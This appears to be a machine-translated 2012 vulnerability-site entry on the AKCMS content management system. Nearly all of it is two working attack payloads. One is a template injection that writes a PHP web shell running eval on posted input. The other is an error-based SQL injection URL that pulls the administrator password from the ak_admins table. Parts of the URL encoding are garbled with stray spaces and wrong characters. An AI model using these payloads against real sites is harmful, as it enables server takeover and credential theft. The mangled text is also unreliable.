AKCMS is injected and the background holding shell vulnerability-vulnerability warning-the black bar safety net

2012-09-25T00:00:00
ID MYHACK58:62201235027
Type myhack58
Reporter 佚名
Modified 2012-09-25T00:00:00

Description

!

!

The template is written the following:

<{php}> fputs(fopen(“./ 0x80c.php”,”w”),”<? eval($_POST[0x80c]);?>”) <{/php}>

Then

!

The administrator password can be injected to obtain

http://www.myhack58.com/akcms_keyword.php?sid=11111%27and%28select%201%20from%28select%20count%28%2 9,concat%2 8%28select%2 0%28select%2 0%28select%20concat%280x7e,0×2 7,password,0×2 7,0x7e%2 9%20from%20ak_admins%20limit%200,1%2 9% 2 9%20from%20information_schema. tables%20limit%200,1%2 9,floor%28rand%2 8 0% 2 92%2 9%29x%20from%20information_schema. tables%20group%20by%20x%29a%2 9%20and%2 0%2 7 1%2 7=%2 7 1&keyword=1 1